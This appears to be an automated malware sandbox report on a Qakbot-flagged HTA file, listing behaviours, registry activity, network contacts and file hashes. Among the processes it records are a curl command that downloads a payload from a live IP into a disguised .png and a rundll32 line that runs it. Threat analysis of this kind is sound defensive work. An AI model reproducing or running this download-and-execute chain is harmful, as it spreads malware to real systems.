Analysis Overview
SHA256
4ed16497feaa7bbd98b485d057bf25cb3f24132c6a9f52d4c7b838e6a7f5f761
Threat Level: Known bad
The file DocumentsFolder_729396_Feb_03.one_2.hta was found to be: Known bad.
Malicious Activity Summary
Qakbot/Qbot
Downloads MZ/PE file
Loads dropped DLL
Checks computer location settings
Enumerates physical storage devices
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-03 18:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-03 18:03
Reported
2023-02-03 18:04
Platform
win7-20220812-en
Max time kernel
1s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\DocumentsFolder_729396_Feb_03.one_2.hta"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2023-02-03 18:03
Reported
2023-02-03 18:06
Platform
win10v2004-20221111-en
Max time kernel
150s
Max time network
146s
Command Line
Signatures
Qakbot/Qbot
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\DocumentsFolder_729396_Feb_03.one_2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\curl.exe
"C:\Windows\System32\curl.exe" --output C:\ProgramData\aMqKd.png --url http://45.8.191.141/80567.dat
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\ProgramData\aMqKd.png,Wind
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im mshta.exe
C:\Windows\SysWOW64\wermgr.exe
C:\Windows\SysWOW64\wermgr.exe
C:\Windows\SysWOW64\wermgr.exe
C:\Windows\SysWOW64\wermgr.exe
Network
| Country | Destination | Domain | Proto |
| TR | 45.8.191.141:80 | 45.8.191.141 | tcp |
| US | 72.21.81.240:80 | | tcp |
| JP | 40.79.189.59:443 | | tcp |
| US | 72.21.81.240:80 | | tcp |
| US | 72.21.81.240:80 | | tcp |
| US | 72.21.81.240:80 | | tcp |
| NL | 104.80.225.205:443 | | tcp |
Files
memory/444-132-0x0000000000000000-mapping.dmp
memory/2724-133-0x0000000000000000-mapping.dmp
C:\ProgramData\aMqKd.png
| MD5 | 34b7dfe6ca2d3996915cb538df6f2876 |
| SHA1 | aab8372031ca4c36ca41b70c7b36bc12d7de1f99 |
| SHA256 | b4eb4929936981f3c05505c7a8ea6b506a21b2bff3d14ec9276f38996450b7a5 |
| SHA512 | 9d662dc7150eca82cdd56d6a17be4a7f1f6949ce7f4737797f271a2696ce569d471691ef78c30d50b42af372e3802d6c2f46ea3ca6f6a28a73ca7df98191dc73 |
memory/2724-136-0x0000000000DA0000-0x0000000000DC3000-memory.dmp
memory/3888-141-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\A8D175DE.dll
| MD5 | f530495445432d6ae00f2b0f08f7c804 |
| SHA1 | f66f538b95b1a924c8392fbe7743d193d78eb50c |
| SHA256 | 5cc51f26704eef3b59e6d33ea690fa5c62237627269493ead5bad6f71d2de07b |
| SHA512 | 2b44ed622e63014a0d2d613d8bbc1548dd193460ce7711414dc4eb62a2aef69d57c9821f834555539b6a49f584cb46c5e82a9867ab0a0733d78e4f1d032d6ce8 |
memory/2128-144-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\3F9614FB.dll
| MD5 | f530495445432d6ae00f2b0f08f7c804 |
| SHA1 | f66f538b95b1a924c8392fbe7743d193d78eb50c |
| SHA256 | 5cc51f26704eef3b59e6d33ea690fa5c62237627269493ead5bad6f71d2de07b |
| SHA512 | 2b44ed622e63014a0d2d613d8bbc1548dd193460ce7711414dc4eb62a2aef69d57c9821f834555539b6a49f584cb46c5e82a9867ab0a0733d78e4f1d032d6ce8 |
memory/2128-145-0x0000000000E00000-0x0000000000E23000-memory.dmp
memory/2128-146-0x0000000000E00000-0x0000000000E23000-memory.dmp